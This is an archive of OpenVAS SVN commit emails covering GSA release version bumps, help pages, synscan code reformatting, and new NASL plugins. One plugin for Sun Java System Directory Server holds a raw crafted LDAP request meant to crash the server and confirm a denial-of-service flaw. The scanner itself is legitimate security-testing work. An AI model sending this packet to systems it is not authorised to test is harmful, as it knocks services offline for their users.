SET(CPACK_TOPLEVEL_TAG "") -SET(CPACK_PACKAGE_VERSION_MAJOR "0") -SET(CPACK_PACKAGE_VERSION_MINOR "8") -SET(CPACK_PACKAGE_VERSION_PATCH "4${SVN_REVISION}") +SET(CPACK_PACKAGE_VERSION_MAJOR "1") +SET(CPACK_PACKAGE_VERSION_MINOR "0") +SET(CPACK_PACKAGE_VERSION_PATCH "0-beta1${SVN_REVISION}") SET(CPACK_PACKAGE_VERSION "${CPACK_PACKAGE_VERSION_MAJOR}.${CPACK_PACKAGE_VERSION_MINOR}.${CPACK_PACKAGE_VERSION_PATCH}") SET(CPACK_PACKAGE_FILE_NAME "${PROJECT_NAME}-${CPACK_PACKAGE_VERSION}") SET(CPACK_SOURCE_PACKAGE_FILE_NAME "${PROJECT_NAME}-${CPACK_PACKAGE_VERSION}") Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-12 10:58:37 UTC (rev 6380) +++ trunk/gsa/ChangeLog 2010-01-12 11:00:57 UTC (rev 6381) @@ -1,3 +1,13 @@ +2010-01-12 Michael Wiegand + + Preparing the gsa 1.0.0-beta1 release. + + * CMakeLists.txt: Updated version number. + + * src/html/src/about.htm4: Updated. + + * CHANGES: New. + 2010-01-12 Felix Wolfsteller Minor help improvements and fixes. Modified: trunk/gsa/src/html/src/about.htm4 =================================================================== --- trunk/gsa/src/html/src/about.htm4 2010-01-12 10:58:37 UTC (rev 6380) +++ trunk/gsa/src/html/src/about.htm4 2010-01-12 11:00:57 UTC (rev 6381) @@ -4,7 +4,7 @@ -

            Greenbone Security Assistant Version 0.8.4.SVN

            +

            Greenbone Security Assistant Version 1.0.0-beta1

            The Greenbone Security Assistant is a web-based graphical From scm-commit at wald.intevation.org Tue Jan 12 12:02:55 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 12:02:55 +0100 (CET) Subject: [Openvas-commits] r6382 - tags Message-ID: <20100112110255.0748E86607DB@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-12 12:02:54 +0100 (Tue, 12 Jan 2010) New Revision: 6382 Added: tags/gsa-release-1.0.0-beta1/ Log: Tagging the gsa 1.0.0-beta1 release. Copied: tags/gsa-release-1.0.0-beta1 (from rev 6381, trunk/gsa) From scm-commit at wald.intevation.org Tue Jan 12 12:04:34 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 12:04:34 +0100 (CET) Subject: [Openvas-commits] r6383 - in trunk/gsa: . src/html/src Message-ID: <20100112110434.863BC865F468@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-12 12:04:34 +0100 (Tue, 12 Jan 2010) New Revision: 6383 Modified: trunk/gsa/CMakeLists.txt trunk/gsa/ChangeLog trunk/gsa/src/html/src/about.htm4 Log: Post release version bump. * CMakeLists.txt: Updated version number. * src/html/src/about.htm4: Updated. Modified: trunk/gsa/CMakeLists.txt =================================================================== --- trunk/gsa/CMakeLists.txt 2010-01-12 11:02:54 UTC (rev 6382) +++ trunk/gsa/CMakeLists.txt 2010-01-12 11:04:34 UTC (rev 6383) @@ -154,7 +154,7 @@ SET(CPACK_TOPLEVEL_TAG "") SET(CPACK_PACKAGE_VERSION_MAJOR "1") SET(CPACK_PACKAGE_VERSION_MINOR "0") -SET(CPACK_PACKAGE_VERSION_PATCH "0-beta1${SVN_REVISION}") +SET(CPACK_PACKAGE_VERSION_PATCH "0-beta2${SVN_REVISION}") SET(CPACK_PACKAGE_VERSION "${CPACK_PACKAGE_VERSION_MAJOR}.${CPACK_PACKAGE_VERSION_MINOR}.${CPACK_PACKAGE_VERSION_PATCH}") SET(CPACK_PACKAGE_FILE_NAME "${PROJECT_NAME}-${CPACK_PACKAGE_VERSION}") SET(CPACK_SOURCE_PACKAGE_FILE_NAME "${PROJECT_NAME}-${CPACK_PACKAGE_VERSION}") Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-12 11:02:54 UTC (rev 6382) +++ trunk/gsa/ChangeLog 2010-01-12 11:04:34 UTC (rev 6383) @@ -1,5 +1,13 @@ 2010-01-12 Michael Wiegand + Post release version bump. + + * CMakeLists.txt: Updated version number. + + * src/html/src/about.htm4: Updated. + +2010-01-12 Michael Wiegand + Preparing the gsa 1.0.0-beta1 release. * CMakeLists.txt: Updated version number. Modified: trunk/gsa/src/html/src/about.htm4 =================================================================== --- trunk/gsa/src/html/src/about.htm4 2010-01-12 11:02:54 UTC (rev 6382) +++ trunk/gsa/src/html/src/about.htm4 2010-01-12 11:04:34 UTC (rev 6383) @@ -4,7 +4,7 @@ -

            Greenbone Security Assistant Version 1.0.0-beta1

            +

            Greenbone Security Assistant Version 1.0.0-beta2.SVN

            The Greenbone Security Assistant is a web-based graphical From scm-commit at wald.intevation.org Tue Jan 12 12:14:05 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 12:14:05 +0100 (CET) Subject: [Openvas-commits] r6384 - trunk/doc/website Message-ID: <20100112111405.87620865F468@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-12 12:14:04 +0100 (Tue, 12 Jan 2010) New Revision: 6384 Modified: trunk/doc/website/template_header.m4 Log: Updated links for the recent openvas-manager and gsa releases. Modified: trunk/doc/website/template_header.m4 =================================================================== --- trunk/doc/website/template_header.m4 2010-01-12 11:04:34 UTC (rev 6383) +++ trunk/doc/website/template_header.m4 2010-01-12 11:14:04 UTC (rev 6384) @@ -154,9 +154,9 @@ openvas-scanner 3.0.0
            openvas-client 3.0.0
            Optional:
            - openvas-manager 0.9.8
            + openvas-manager 1.0.0-beta1
            openvas-administrator 0.4.0
            - gsa 0.8.3
            + gsa 1.0.0-beta1

            From scm-commit at wald.intevation.org Tue Jan 12 12:22:12 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 12:22:12 +0100 (CET) Subject: [Openvas-commits] r6385 - in trunk/openvas-plugins: . scripts Message-ID: <20100112112212.1A6C986607DB@pyrosoma.intevation.org> Author: mime Date: 2010-01-12 12:22:08 +0100 (Tue, 12 Jan 2010) New Revision: 6385 Added: trunk/openvas-plugins/scripts/sun_dir_server_37699.nasl trunk/openvas-plugins/scripts/sun_dir_server_detect.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-12 11:14:04 UTC (rev 6384) +++ trunk/openvas-plugins/ChangeLog 2010-01-12 11:22:08 UTC (rev 6385) @@ -1,3 +1,9 @@ +2010-01-12 Michael Meyer + + * scripts/sun_dir_server_detect.nasl, + scripts/sun_dir_server_37699.nasl: + Added new plugins. + 2010-01-11 Thomas Reinke * scripts/deb_1966_1.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-12 11:14:04 UTC (rev 6384) +++ trunk/openvas-plugins/cve_current.txt 2010-01-12 11:22:08 UTC (rev 6385) @@ -479,3 +479,4 @@ CVE-2009-4535 SecPod svn R CVE-2009-4486 Greenbone svn R 37640 Greenbone svn R +37699 Greenbone svn R Added: trunk/openvas-plugins/scripts/sun_dir_server_37699.nasl =================================================================== --- trunk/openvas-plugins/scripts/sun_dir_server_37699.nasl 2010-01-12 11:14:04 UTC (rev 6384) +++ trunk/openvas-plugins/scripts/sun_dir_server_37699.nasl 2010-01-12 11:22:08 UTC (rev 6385) @@ -0,0 +1,119 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Sun Java System Directory Server 'core_get_proxyauth_dn' Denial of Service Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100438); + script_bugtraq_id(37699); + script_version ("1.0-$Revision$"); + + script_name("Sun Java System Directory Server 'core_get_proxyauth_dn' Denial of Service Vulnerability"); + +desc = "Overview: +Sun Java System Directory Server is prone to a denial-of-service +vulnerability. + +An attacker can exploit this issue to crash the effected application, +denying service to legitimate users. + +Directory Server 7.0 is vulnerable; other versions may also be +affected. + +References: +http://www.securityfocus.com/bid/37699 +http://intevydis.blogspot.com/2010/01/sun-directory-server-70.html +http://www.sun.com/software/products/directory_srvr/home_directory.xml + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Sun Java System Directory Server is prone to a denial-of-service vulnerability"); + script_category(ACT_MIXED_ATTACK); + script_family("Denial of Service"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("sun_dir_server_detect.nasl"); + script_require_ports("Services/ldap", 389); + exit(0); +} + +include("version_func.inc"); + +port = get_kb_item("Services/ldap"); +if(!port)exit(0); +if(!get_port_state(port))exit(0); + +if(safe_checks()) { + + if(!version = get_kb_item(string("ldap/",port,"/SunJavaDirServer")))exit(0); + + if(!isnull(version)) { + if(version_is_equal(version: version, test_version: "7.0")) { + security_warning(port:port); + exit(0); + } + } +} + +else { + + include("ldap.inc"); + + if(!ldap_alive(port:port))exit(0); + + # Try to kill the server + req = raw_string(0x30,0x82,0x01,0x15,0x02,0x01,0x01,0x63,0x82,0x01,0x0e,0x04,0x00,0x0a,0x01,0x02, + 0x0a,0x01,0x00,0x02,0x01,0x00,0x02,0x01,0x00,0x01,0x01,0x00,0x87,0x0b,0x6f,0x62, + 0x6a,0x65,0x63,0x74,0x43,0x6c,0x61,0x73,0x73,0x30,0x02,0x04,0x00,0xa0,0x81,0xe9, + 0x30,0x81,0xe6,0x04,0x18,0x32,0x2e,0x31,0x36,0x2e,0x38,0x34,0x30,0x2e,0x31,0x2e, + 0x31,0x31,0x33,0x37,0x33,0x30,0x2e,0x33,0x2e,0x34,0x2e,0x31,0x38,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01, + 0x01,0x01,0x01,0x01,0x01,0x01,0x00,0x04,0x00); + + soc = open_sock_tcp(port); + if(!soc)exit(0); + send(socket:soc, data:req); + close(soc); + + sleep(5); # server needs a few seconds to die, + + if(!ldap_alive(port:port)) { + security_warning(port:port); + exit(0); + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/sun_dir_server_37699.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/sun_dir_server_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/sun_dir_server_detect.nasl 2010-01-12 11:14:04 UTC (rev 6384) +++ trunk/openvas-plugins/scripts/sun_dir_server_detect.nasl 2010-01-12 11:22:08 UTC (rev 6385) @@ -0,0 +1,115 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Sun Java System Directory Server Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Sun Java System Directory Server. + +Risk factor : None"; + +if (description) +{ + script_id(100437); + script_version ("1.0-$Revision$"); + + script_name("Sun Java System Directory Server Detection"); + script_description(desc); + script_summary("Checks for the presence of Sun Java System Directory Server"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("ldap_detect.nasl"); + script_require_ports("Services/ldap", 389); + exit(0); +} + +include("misc_func.inc"); +include("dump.inc"); +include("global_settings.inc"); + +port = get_kb_item("Services/ldap"); + +if(!port)exit(0); +if(!get_port_state(port))exit(0); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +req = +raw_string(0x30,0x25,0x02,0x01,0x01,0x63,0x20,0x04,0x00,0x0a,0x01,0x00,0x0a,0x01,0x00,0x02, + 0x01,0x00,0x02,0x01,0x00,0x01,0x01,0x00,0x87,0x0b,0x6f,0x62,0x6a,0x65,0x63,0x74, + 0x43,0x6c,0x61,0x73,0x73,0x30,0x00); + +send(socket:soc, data:req); +data = recv(socket:soc, length:5000); + +if( data == NULL ) exit(0); +close(soc); + +len = strlen (data); + +if(len <32)exit(0); + +linenumber = len / 16; + +for (i=0;i<=linenumber;i++) { + for (j=0;j<16;j++) { + if ((i*16+j)< len) { + if(ord(data[i*16+j]) == "48" && ord(data[i*16+j+2]) == '4') { + str += "#"; + } else { + c = data[i*16+j]; + if (isprint (c:c)) { + str += c; + } + } + } + } +} + + if("Sun-Directory-Server" >< str ) { + version = eregmatch(string:str, pattern:"Sun-Directory-Server/([0-9.]+([^#]+)?)"); + if(!isnull(version[1])) { + set_kb_item(name:string("ldap/",port,"/SunJavaDirServer"), value:version[1]); + set_kb_item(name:string("cpe:/a:sun:java_system_directory_server:",version[1]), value: TRUE); + info = string("None\n\nSun Java System Directory Server Version '"); + info += string(version[1]); + info += string("' was detected on the remote host\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + } + if(report_verbosity > 0) { + security_note(port:port,data:desc); + exit(0); + } + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/sun_dir_server_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Tue Jan 12 12:43:05 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 12:43:05 +0100 (CET) Subject: [Openvas-commits] r6386 - in trunk/gsa: . src/html/src src/html/src/help Message-ID: <20100112114305.EAAAB86607A1@pyrosoma.intevation.org> Author: felix Date: 2010-01-12 12:43:05 +0100 (Tue, 12 Jan 2010) New Revision: 6386 Added: trunk/gsa/src/html/src/help/scanconfig_family_details.htm4 trunk/gsa/src/html/src/help/scanconfig_nvt_details.htm4 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/omp.xsl Log: Updated help. * src/html/src/help/scanconfig_familiy_details.htm4: New. Contains help texts regarding Family Details Viewing functionality. * src/html/src/help/scanconfig_nvt_details.htm4: New. Contains help texts regarding NVT and NVT Preference Viewing functionality * src/html/src/omp.xsl: Added links to new help pages. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-12 11:22:08 UTC (rev 6385) +++ trunk/gsa/ChangeLog 2010-01-12 11:43:05 UTC (rev 6386) @@ -1,3 +1,15 @@ +2010-01-12 Felix Wolfsteller + + Updated help. + + * src/html/src/help/scanconfig_familiy_details.htm4: New. Contains + help texts regarding Family Details Viewing functionality. + + * src/html/src/help/scanconfig_nvt_details.htm4: New. Contains help + texts regarding NVT and NVT Preference Viewing functionality + + * src/html/src/omp.xsl: Added links to new help pages. + 2010-01-12 Michael Wiegand Post release version bump. Added: trunk/gsa/src/html/src/help/scanconfig_family_details.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_family_details.htm4 2010-01-12 11:22:08 UTC (rev 6385) +++ trunk/gsa/src/html/src/help/scanconfig_family_details.htm4 2010-01-12 11:43:05 UTC (rev 6386) @@ -0,0 +1,54 @@ +m4_define(`PAGE_TITLE', `Help: Scan Config Details') +m4_include(`header.m4') + +


            + + +

            Scan Config Family Details

            + +

            +This page gives an overview of NVTs of one +family in a Scan Configuration. +

            + +

            Network Vulnerability Tests

            + +

            +This table provides an overview of NVTs of one family in a Scan Configuration. +

            + + + + + + + + + + + + + + + + + + + + + + +
            ColumnDescription
            NameShows the name of a NVT.
            OIDShows the OID of a NVT.
            TimeoutShows current timeout setting in seconds for a NVT (or "default" if the + default value is used).
            PreferencesShows the number of Preferences of a NVT.
            + +

            Actions

            + +

            NVT Details

            + +

            +A click on the details icon GSAD_HTML_ICON_DETAILS +will lead to the page listing NVT details. +

            + +m4_include(`footer.m4') Added: trunk/gsa/src/html/src/help/scanconfig_nvt_details.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_nvt_details.htm4 2010-01-12 11:22:08 UTC (rev 6385) +++ trunk/gsa/src/html/src/help/scanconfig_nvt_details.htm4 2010-01-12 11:43:05 UTC (rev 6386) @@ -0,0 +1,54 @@ +m4_define(`PAGE_TITLE', `Help: Scan Config NVT Details') +m4_include(`header.m4') + +
            + +

            Scan Config NVT Details

            + +

            +This dialog shows information of a single NVT +and its preference settings within a +Scan Configuration. +

            + +

            Network Vulnerability Test

            + +

            Details

            + +

            +Provides information like the name of the NVT, a summary, its OID, Family +Affiliation and References. +

            + +

            Description

            + +

            +This section provides a description of the NVT. It might contain a +classification into a Risk Factor and suggest solutions to fix the issue that +can be detected by this NVT. +

            + +

            Preferences

            + +

            +This table shows values of the timeout and NVT specific preferences one per +row. +

            + + + + + + + + + + + + + + +
            ColumnDescription
            NameShows the name of the NVT Preference.
            ValueThe value for the NVT Preference in the given Scan Configuration.
            + +m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-12 11:22:08 UTC (rev 6385) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-12 11:43:05 UTC (rev 6386) @@ -2540,12 +2540,16 @@ Edit Scan Config Family Details + title="Help: Configure Scan Configs (Edit Scan Config Family Details)"> Scan Config Family Details + + +
            @@ -3051,14 +3055,24 @@
            - - -
            Edit Scan Config NVT Details
            -             - -
            Scan Config NVT Details
            -             -             +
            + + + Edit Scan Config NVT Details + + + + + + Scan Config NVT Details + + + + + +
            From scm-commit at wald.intevation.org Tue Jan 12 14:03:28 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 14:03:28 +0100 (CET) Subject: [Openvas-commits] r6387 - in trunk/openvas-scanner: . cnvts/synscan Message-ID: <20100112130328.AAFA886607AF@pyrosoma.intevation.org> Author: felix Date: 2010-01-12 14:03:27 +0100 (Tue, 12 Jan 2010) New Revision: 6387 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/cnvts/synscan/synscan.c Log: * cnvts/synscan/synscan.c: Reformatting, added svn revision keyword property. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2010-01-12 11:43:05 UTC (rev 6386) +++ trunk/openvas-scanner/ChangeLog 2010-01-12 13:03:27 UTC (rev 6387) @@ -1,3 +1,8 @@ +2010-01-12 Felix Wolfsteller + + * cnvts/synscan/synscan.c: Reformatting, added svn revision keyword + property. + 2009-12-18 Michael Wiegand Post-release version bump. Modified: trunk/openvas-scanner/cnvts/synscan/synscan.c =================================================================== --- trunk/openvas-scanner/cnvts/synscan/synscan.c 2010-01-12 11:43:05 UTC (rev 6386) +++ trunk/openvas-scanner/cnvts/synscan/synscan.c 2010-01-12 13:03:27 UTC (rev 6387) @@ -28,10 +28,9 @@ struct tcphdr tcpheader; }; -static int -in_cksum(p, n) - u_short *p; - int n; + +static int +in_cksum (u_short *p, int n) { register u_short answer; register unsigned long sum = 0; @@ -54,8 +53,7 @@ } - -unsigned long +unsigned long maketime() { struct timeval tv; @@ -67,13 +65,12 @@ ret = ((tv.tv_sec & 0x0000000F) << 28) | (((tv.tv_usec) & 0xFFFFFFF0) >> 4); - return htonl(ret); } -struct timeval -timeval(unsigned long val) +struct timeval +timeval (unsigned long val) { struct timeval ret; unsigned int h, l; @@ -82,7 +79,7 @@ h = ( val & 0xF0000000 ) >> 28; l = ( val & 0x0FFFFFFF) << 4; - + ret.tv_sec = h; ret.tv_usec = l; while ( ret.tv_usec >= 1000000 ) @@ -99,13 +96,8 @@ } - - - - - -unsigned long -compute_rtt(unsigned long then) +unsigned long +compute_rtt (unsigned long then) { unsigned long now = maketime(); unsigned long res; @@ -126,8 +118,8 @@ } -int -packetdead(unsigned long then, unsigned long rtt) +int +packetdead (unsigned long then, unsigned long rtt) { unsigned long now = maketime(); @@ -145,7 +137,8 @@ } -int rawsocket(int family) +int +rawsocket (int family) { int soc; int opt = 1; @@ -181,8 +174,8 @@ } -int -openbpf(struct in_addr dst, struct in_addr * src, int magic) +int +openbpf (struct in_addr dst, struct in_addr * src, int magic) { char *iface; char filter[255]; @@ -194,8 +187,9 @@ return bpf; } -int -v6_openbpf(struct in6_addr *dst, struct in6_addr * src, int magic) + +int +v6_openbpf (struct in6_addr *dst, struct in6_addr * src, int magic) { char *iface; char filter[255]; @@ -213,6 +207,7 @@ } /*----------------------------------------------------------------------------*/ + struct list { unsigned short dport; unsigned long when; @@ -221,8 +216,9 @@ struct list *next; }; -struct list * -get_packet(struct list * l, unsigned short dport) + +struct list* +get_packet (struct list * l, unsigned short dport) { while (l != NULL) { if (l->dport == dport) @@ -234,7 +230,7 @@ } -struct list * +struct list* add_packet(struct list * l, unsigned short dport, unsigned long ack) { struct list *ret; @@ -263,9 +259,8 @@ } - -struct list * -rm_packet(struct list * l, unsigned short dport) +struct list* +rm_packet (struct list * l, unsigned short dport) { struct list *ret = l; struct list *p = get_packet(l, dport); @@ -288,8 +283,8 @@ return ret; } -struct list * -rm_dead_packets(struct list * l, unsigned long rtt, int *retry) +struct list* +rm_dead_packets (struct list * l, unsigned long rtt, int *retry) { struct list *ret = l; struct list *p = l; @@ -329,28 +324,31 @@ /*-----------------------------------------------------------------------------*/ -struct tcphdr * extracttcp(char * pkt, int len) +struct tcphdr * +extracttcp (char * pkt, int len) { struct ip * ip; struct tcphdr *tcp; - + ip = (struct ip*)pkt; if(ip->ip_hl * 4 + sizeof(struct tcphdr) > len) return NULL; - + tcp = (struct tcphdr*)(pkt + ip->ip_hl * 4); return tcp; } -struct tcphdr * v6_extracttcp(char * pkt, int len) +struct tcphdr * +v6_extracttcp (char * pkt, int len) { struct tcphdr *tcp; tcp = (struct tcphdr*)(pkt + 40); return tcp; } -unsigned long -extractack(char *pkt, int len, int family) + +unsigned long +extractack (char *pkt, int len, int family) { unsigned long ret; struct tcphdr *tcp; @@ -367,8 +365,8 @@ } -unsigned short -extractsport(char *pkt, int len, int family) +unsigned short +extractsport (char *pkt, int len, int family) { struct tcphdr *tcp; @@ -382,8 +380,8 @@ return ntohs(tcp->th_sport); } -int -issynack(char *pkt, int len, int family) +int +issynack (char *pkt, int len, int family) { struct tcphdr *tcp; @@ -397,8 +395,8 @@ return tcp->th_flags == (TH_SYN | TH_ACK); } -char * -mktcp(struct in_addr src, int sport, struct in_addr dst, int dport, unsigned long th_ack, unsigned char flag) +char* +mktcp (struct in_addr src, int sport, struct in_addr dst, int dport, unsigned long th_ack, unsigned char flag) { static char pkt[sizeof(struct ip) + sizeof(struct tcphdr)]; struct ip *ip; @@ -445,7 +443,7 @@ } char * -mktcpv6(struct in6_addr *src, int sport, struct in6_addr *dst, int dport, unsigned long th_ack, unsigned char flag) +mktcpv6 (struct in6_addr *src, int sport, struct in6_addr *dst, int dport, unsigned long th_ack, unsigned char flag) { static char pkt[sizeof(struct tcphdr)]; struct tcphdr *tcp; @@ -465,8 +463,8 @@ } /*--------------------------------------------------------------------*/ -int -find_rtt(struct in_addr dst, unsigned long *rtt) +int +find_rtt (struct in_addr dst, unsigned long *rtt) { int soc; unsigned short ports[] = {21, 22, 34, 25, 53, 79, 80, 110, 113, 135, 139, 143, 264, 389, 443, 993, 1454, 1723, 3389, 8080, 0}; @@ -595,15 +593,17 @@ } -struct list * -sendpacket(int soc, int bpf, int skip, struct in_addr dst, struct in_addr src, int dport, int magic, struct list * packets, unsigned long * rtt, int sniff, struct arglist * env) +struct list* +sendpacket (int soc, int bpf, int skip, struct in_addr dst, struct in_addr src, + int dport, int magic, struct list * packets, unsigned long * rtt, + int sniff, struct arglist * env) { unsigned long ack = maketime(); char *pkt = mktcp(src, magic, dst, dport, ack, TH_SYN); int len; char *res; struct sockaddr_in soca; - struct timeval rtt_tv = timeval(*rtt); + struct timeval rtt_tv = timeval(*rtt); int family = AF_INET; bzero(&soca, sizeof(soca)); @@ -663,7 +663,10 @@ } struct list * -v6_sendpacket(int soc, int bpf, int skip, struct in6_addr *dst, struct in6_addr *src, int dport, int magic, struct list * packets, unsigned long * rtt, int sniff, struct arglist * env) +v6_sendpacket (int soc, int bpf, int skip, struct in6_addr *dst, + struct in6_addr *src, int dport, int magic, + struct list * packets, unsigned long * rtt, int sniff, + struct arglist * env) { unsigned long ack = maketime(); char *pkt = mktcpv6(src, magic, dst, dport, ack, TH_SYN); @@ -720,8 +723,11 @@ } -int -scan(struct arglist * env, struct in6_addr *dst6, unsigned long rtt) +/** + * @return -1 if the socket could not be opened (error), 0 otherwise. + */ +int +scan (struct arglist * env, struct in6_addr *dst6, unsigned long rtt) { int num; int soc; @@ -733,103 +739,112 @@ int skip; int i; struct list *packets = NULL; - struct arglist *globals = arg_get_value(env, "globals"); - struct arglist *hostinfos = arg_get_value(env, "HOSTNAME"); - char *hname = arg_get_value(hostinfos, "NAME"); + struct arglist *globals = arg_get_value (env, "globals"); + struct arglist *hostinfos = arg_get_value (env, "HOSTNAME"); + char *hname = arg_get_value (hostinfos, "NAME"); int retry; - char *range = get_preference(env, "port_range"); + char *range = get_preference (env, "port_range"); unsigned short *ports; int family; dst.s_addr = 0; if(IN6_IS_ADDR_V4MAPPED(dst6)) - { - family = AF_INET; - dst.s_addr = dst6->s6_addr32[3]; - soc = rawsocket(AF_INET); - } + { + family = AF_INET; + dst.s_addr = dst6->s6_addr32[3]; + soc = rawsocket (AF_INET); + } else - { - family = AF_INET6; - soc = rawsocket(AF_INET6); - } + { + family = AF_INET6; + soc = rawsocket (AF_INET6); + } #ifdef DEBUG - printf("===> port range = %s\n", range); + printf ("===> port range = %s\n", range); #endif - ports = (unsigned short *) getpts(range, &num); + ports = (unsigned short *) getpts (range, &num); if (soc < 0) - { - printf("error opeining raw socket\n"); - return -1; - } + { + printf ("error opeining raw socket\n"); + return -1; + } - if(family == AF_INET) - bpf = openbpf(dst, &src, magic); + if (family == AF_INET) + bpf = openbpf (dst, &src, magic); else - bpf = v6_openbpf(dst6, &src6, magic); - skip = get_datalink_size(bpf_datalink(bpf)); + bpf = v6_openbpf (dst6, &src6, magic); + skip = get_datalink_size (bpf_datalink (bpf)); - for (i = 0; i < num ; i += 2) { - if (i % 100 == 0) - comm_send_status(globals, hname, "portscan", i, num); + for (i = 0; i < num ; i += 2) + { + if (i % 100 == 0) + comm_send_status (globals, hname, "portscan", i, num); - if(family == AF_INET) - packets = sendpacket(soc, bpf, skip, dst, src, ports[i], magic, packets, &rtt, 0, env); - else - packets = v6_sendpacket(soc, bpf, skip, dst6, &src6, ports[i], magic, packets, &rtt, 0, env); - if ( i + 1 < num ) - { - if(family == AF_INET) - packets = sendpacket(soc, bpf, skip, dst, src, ports[i + 1], magic, packets, &rtt, 1, env); + if (family == AF_INET) + packets = sendpacket (soc, bpf, skip, dst, src, ports[i], magic, + packets, &rtt, 0, env); else - packets = v6_sendpacket(soc, bpf, skip, dst6, &src6, ports[i + 1], magic, packets, &rtt, 1, env); + packets = v6_sendpacket (soc, bpf, skip, dst6, &src6, ports[i], magic, + packets, &rtt, 0, env); + if (i + 1 < num) + { + if (family == AF_INET) + packets = sendpacket (soc, bpf, skip, dst, src, ports[i + 1], + magic, packets, &rtt, 1, env); + else + packets = v6_sendpacket (soc, bpf, skip, dst6, &src6, ports[i + 1], + magic, packets, &rtt, 1, env); + } } - } #ifdef DEBUG - printf("Done with the sending\n"); + printf ("Done with the sending\n"); #endif - /* How to do 